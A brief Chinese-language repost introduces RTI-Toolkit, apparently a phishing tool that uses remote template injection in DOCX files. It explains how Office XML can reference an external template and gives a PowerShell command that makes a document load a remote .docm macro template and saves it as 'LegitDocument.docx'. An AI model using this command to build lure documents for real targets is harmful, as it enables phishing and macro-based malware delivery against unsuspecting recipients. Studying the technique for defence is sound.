RTI-Toolkit 是一个用于远程模板注入攻击的开源 PowerShell 工具包。该工具包包含一个名为 PS-Templator.ps1 的 PowerShell 脚本,可以从攻击和防御的角度使用。
PS-Templator.ps1 仅支持 DOCX 文件。Microsoft Office 上下文中的远程模板注入 (RTI) 是指可通过 Office 文档(例如 Word、Excel、PowerPoint)中的恶意模板利用的特定类型的安全漏洞。例如,在 DOCX 文件中,内容以 XML 格式存储在存档中,其中一些 XML 文件可能引用外部资源或模板。攻击者确实可以操纵这些 XML 文件来插入可能利用漏洞或欺骗用户的恶意链接或内容。这是基于宏的攻击。
加载模块
Import-Module .PS-Templator.ps1
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:UsersUserDesktopLegitDocument.docx
原文始发于微信公众号(Enginge):RTI-Toolkit-快速钓鱼工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论